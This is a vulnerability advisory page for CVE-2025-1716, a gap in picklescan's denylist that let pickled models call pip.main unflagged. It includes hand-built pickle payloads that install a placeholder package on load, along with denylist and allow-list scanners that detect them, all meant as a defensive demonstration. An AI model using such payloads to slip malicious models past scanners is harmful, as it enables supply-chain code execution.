CVE-2025-1716
CRITICAL 9.8
Description
picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.
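The gap described above is easiest to see at the opcode level. The following is an added example, not picklescan's code or anything from the advisory: a minimal scanner that walks a pickle's opcode stream with `pickletools.genops` (no `pickle.loads`, so nothing executes) and reports the globals it resolves, run against a hand-assembled payload that would call `pip.main(['install', 'example-pkg'])` if loaded. The two denylists are constructed for illustration and are not picklescan's real tables; the one without a `pip` entry models the pre-0.0.21 behaviour, the other the fix. `example-pkg` is a placeholder package name. The allow-list helper at the end goes beyond the advisory and shows the design that avoids the CWE-184 class of bug altogether.

```python
import pickletools

# Constructed payload (hand-assembled opcodes, never loaded here): on
# pickle.loads() it would call pip.main(['install', 'example-pkg']).
# 'example-pkg' is a placeholder, not a real package.
PAYLOAD_PROTO2 = (
    b"\x80\x02"            # PROTO 2
    b"cpip\nmain\n"        # GLOBAL 'pip' 'main'  -> pushes pip.main
    b"]"                   # EMPTY_LIST
    b"("                   # MARK
    b"U\x07install"        # SHORT_BINSTRING 'install'
    b"U\x0bexample-pkg"    # SHORT_BINSTRING 'example-pkg'
    b"e"                   # APPENDS -> ['install', 'example-pkg']
    b"\x85"                # TUPLE1  -> (['install', 'example-pkg'],)
    b"R"                   # REDUCE  -> pip.main(*args)
    b"."                   # STOP
)

# Same call expressed with protocol 4's STACK_GLOBAL; a scanner that only
# looks at the GLOBAL opcode would miss this form entirely.
PAYLOAD_PROTO4 = (
    b"\x80\x04"            # PROTO 4
    b"\x8c\x03pip"         # SHORT_BINUNICODE 'pip'
    b"\x8c\x04main"        # SHORT_BINUNICODE 'main'
    b"\x93"                # STACK_GLOBAL -> pip.main
    b"]("                  # EMPTY_LIST, MARK
    b"\x8c\x07install"     # SHORT_BINUNICODE 'install'
    b"\x8c\x0bexample-pkg" # SHORT_BINUNICODE 'example-pkg'
    b"e\x85R."             # APPENDS, TUPLE1, REDUCE, STOP
)

UNICODE_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data):
    """Return every (module, name) the pickle resolves via GLOBAL or
    STACK_GLOBAL by walking the opcode stream; nothing is executed.
    Simplification (assumption): STACK_GLOBAL's operands are taken to be
    the last two string pushes, which holds for pickles that do not route
    those strings through the memo."""
    found = []
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)   # genops gives "module name"
            found.append((module, name))
        elif op.name in UNICODE_OPS:
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
    return found


# Illustrative denylists only (not picklescan's). "*" means every name in
# the module. DENYLIST_OLD has no 'pip' entry, the gap this CVE describes.
DENYLIST_OLD = {
    "builtins": {"eval", "exec", "compile", "open"},
    "os": {"system", "popen", "execv", "execve"},
    "subprocess": {"*"},
}
DENYLIST_FIXED = {**DENYLIST_OLD, "pip": {"*"}}


def scan(data, denylist):
    """Denylist scan: return 'module.name' for each global that is listed."""
    flagged = []
    for module, name in find_globals(data):
        names = denylist.get(module, set())
        if "*" in names or name in names:
            flagged.append(f"{module}.{name}")
    return flagged


def unexpected_globals(data, allowed):
    """Allow-list alternative: report every global not explicitly permitted,
    so a newly found gadget such as pip.main cannot pass unnoticed."""
    return [f"{m}.{n}" for m, n in find_globals(data) if (m, n) not in allowed]


if __name__ == "__main__":
    for label, payload in (("proto2", PAYLOAD_PROTO2), ("proto4", PAYLOAD_PROTO4)):
        print(label, "globals:", find_globals(payload))
        print("  old denylist  :", scan(payload, DENYLIST_OLD) or "passes (false negative)")
        print("  fixed denylist:", scan(payload, DENYLIST_FIXED))
        print("  allow-list    :", unexpected_globals(payload, {("collections", "OrderedDict")}))
```

Both payloads resolve `pip.main`; the old denylist returns nothing for either (the model "appears to be safe"), the fixed one flags `pip.main`, and the allow-list flags it without needing to know about pip at all. The practical caveat: a denylist is only as good as its last entry, so for model files a scanner result of "clean" should be read as "no known gadget found", and loading untrusted pickles should still be avoided in favour of formats that do not execute code on load.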
CVE details
CVSS v3.1 score: 9.8
Severity: CRITICAL
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
User interaction: NONE
Published: 2/26/2025
Last modified: 12/29/2025
Source: nvd
Honeypot sightings: 0
Affected products
mmaitre314:picklescan
Weaknesses (CWE)
CWE-184 (Incomplete List of Disallowed Inputs)
References
https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d
https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v
https://www.sonatype.com/security-advisories/cve-2025-1716
IOC correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.